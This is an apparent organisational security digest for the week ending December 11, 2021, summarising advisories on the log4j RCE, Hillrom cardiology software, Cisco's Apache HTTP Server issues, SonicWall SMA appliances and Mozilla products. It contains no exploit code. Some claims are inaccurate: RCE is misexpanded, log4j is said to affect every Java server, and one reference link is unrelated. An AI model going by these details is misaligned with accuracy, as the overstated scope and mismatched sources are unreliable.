Please see Security Advisories for the week ending December 11, 2021
- Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j
- Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability
- CISA Releases Security Advisory for Hillrom Welch Allyn Cardiology Products
- Cisco Releases Security Advisory for Multiple Products Affected by Apache HTTP Server
- SonicWall Releases Security Patches for SMA 100 Series Appliances
- Mozilla Releases Security Updates for Firefox, Firefox ESR, and Thunderbird
_______________________________
Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j
Situation
A critical RCE (aRbitrary Code Execution) has been found in log4j, a popular logging tool. This vulnerability is severe and affects every server running Java.
Problem
This vulnerability affects any Java application using log4j. An attacker can send a string to the server and the server will execute code hosted at the address.
Implication
This attack is extremely easy to execute and many popular products are affected such as Minecraft, Steam, iCloud, and much more.
JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are currently not affected by the primary attack vector (LDAP) but there are other attack vectors in use.
Need
It is advised to update servers running Java or log4j ASAP. The update for log4j can be found here: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
There are also ways to mitigate the issue if patching is not available.
For a more technical overview:
________________________________
Apache Releases Log4j Version 2.15.0 to Address Critical RCE Vulnerability Under
Situation
The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1.
Problem
JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.
Implication
A remote attacker could exploit this vulnerability to take control of an affected system.
Need
CISA encourages users and administrators to review the Apache Log4j 2.15.0 Announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.
For a brief overview:
For a more technical overview:
https://isc.sans.edu/forums/diary/Keeping+Track+of+Time+Network+Time+Protocol+and+a+GPSD+Bug/27886/
________________________________
CISA Releases Security Advisory for Hillrom Welch Allyn Cardiology Products
Situation
CISA has released an Industrial Controls Systems Medical Advisory (ICSMA) detailing a vulnerability in multiple Hillrom Welch Allyn cardiology products.
Problem
The impacted products, when configured to use SSO, are affected by an improper authentication vulnerability. This vulnerability allows the application to accept manual entry of any active directory (AD) account provisioned in the application without supplying a password, resulting in access to the application as the supplied AD account, with all associated privileges.
Implication
An attacker could exploit this vulnerability to take control of an affected system.
Need
CISA encourages technicians and administrators to review ICSMA-21-343-01: Hillrom Welch Allyn Cardio Products for more information and apply the necessary mitigations.
For a brief overview:
For a more technical overview:
https://www.cisa.gov/uscert/ics/advisories/icsma-21-343-01
________________________________
Cisco Releases Security Advisory for Multiple Products Affected by Apache HTTP Server
Situation
Cisco has released a security advisory to address Cisco products affected by multiple vulnerabilities in Apache HTTP Server 2.4.48 and earlier releases.
Problem
The vulnerability is due to incorrect handling of Unix: URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request to a vulnerable device. A successful exploit could allow the attacker to get, modify, or delete resources on other services that may be inaccessible otherwise.
Implication
An unauthenticated remote attacker could exploit this vulnerability to take control of an affected system.
Need
CISA encourages users and administrators to review Cisco Advisory cisco-sa-apache-httpd-2.4.49-VWL69sWQ and apply the necessary updates.
For a brief overview:
For a more technical overview:
________________________________
SonicWall Releases Security Patches for SMA 100 Series Appliances
Situation
SonicWall has released an update to patch multiple vulnerabilities found in SMA 100 series products including SMA 200, 210, 400, 410 and 500v appliances.
Problem
The vulnerabilities include heap-based and stack-based buffer overflows, remote code execution (RCE), CPU exhaustion, command injection as root, and more. These vulnerabilities range in severity from critical and medium (CVSS 5.3 – 9.8). The CISA has warned of threat actors actively targeting a known/previously patched vulnerabilities in SonicWall SMA 100 series appliances.
Implication
If a remote attacker successfully exploits some of these vulnerabilities it could allow them to take control of an affected system.
Need
SonicWall strongly urges impacted customers to implement applicable patches as soon as possible to affected SMA 100 series products. Additional information can be found in SonicWall’s security advisory in the link below.
SonicWall security advisory:
________________________________
Mozilla Releases Security Updates for Firefox, Firefox ESR, and Thunderbird
Situation
Mozilla has released security updates for Firefox 95, Firefox ESR 91.4.0, and Thunderbird 91.4.0 releases.
Problem
Mozilla has released fixes that addressed vulnerabilities such as URL leakage, heap buffer overflows, missing Fullscreen and pointer lock notifications, GC rooting failure when calling wasm instance methods, full screen mode issues on MacOS.
Implication
An attacker could exploit some of these vulnerabilities to take control of an affected system.
Need
CISA encourages users and administrators to review the Mozilla security advisories for Firefox 95, Firefox ESR 91.4.0, and Thunderbird 91.4.0 and apply the necessary updates.
For a brief overview:
For a more technical overview:
https://www.mozilla.org/en-US/security/advisories/mfsa2021-52/
https://www.mozilla.org/en-US/security/advisories/mfsa2021-53/
https://www.mozilla.org/en-US/security/advisories/mfsa2021-54/